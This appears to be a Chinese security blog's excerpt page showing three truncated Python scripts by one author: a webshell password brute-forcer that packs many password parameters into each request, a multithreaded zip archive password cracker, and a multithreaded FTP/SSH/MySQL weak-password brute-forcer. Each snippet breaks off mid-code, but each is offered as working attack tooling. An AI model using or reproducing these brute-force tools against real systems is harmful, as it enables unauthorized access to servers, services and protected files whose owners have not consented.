利用多参数提高webshell爆破速度

0x00 原理 之前在https://www.t00ls.net/viewthread.php?tid=36985看到这个思路的。 Apache下默认同时允许接收1000个参数;IIS下默认同时允许接收5883个参数,可以一次提交多个密码,从而快速爆破。 0x01 爆破webshell代码 #!/usr/bin/env python # -*- coding: utf-8 -*- # code by reber <1070018473@qq.com> import sys import requests proxy = {'http':'http://127.0.0.1:8080'} headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', } def get_file(filename): data = [] with open(filename,'r') as f: lines = f.readlines() for line in lines: data.append(line.strip()) return data def get_payloads(data): payloads = [] for x in xrange(0,10): print x*1000,(x+1)*1000 payload = [] for y in data[x*1000:(x+1)*1000]: payload.


Python爆破zip压缩包

0x00 代码 多线程爆破加密的zip压缩包 #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import optparse import zipfile import threading import Queue queue = Queue.Queue() lock = threading.Lock() result = '' def load_pwd(filename): for line in open(filename,'r'): if line: queue.put(line.strip()) def bruter(zipname,queue): global result zFile = zipfile.ZipFile(zipname) while not queue.empty(): password = queue.get() try: zFile.extractall(pwd=password) # 解压 lock.acquire() print "[Ok] password is: %s" % password lock.release() result = password except: lock.acquire() print "[Error] password not is: %s" % password lock.


Python实现多线程弱口令爆破

0x00 脚本 #!/usr/bin/env python # -*- coding: utf-8 -*- 'this script can bruter ftp/ssh/mysql' __author__ = 'reber' import Queue import threading import time import logging import socket from optparse import OptionParser import paramiko from ftplib import FTP import MySQLdb #################公有类################# class CommonFun(object): """docstring for CommonFun""" def __init__(self): super(CommonFun, self).__init__() def set_log(self,lname): logger = logging.getLogger(lname) logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') ch.setFormatter(formatter) logger.



可以返回顶部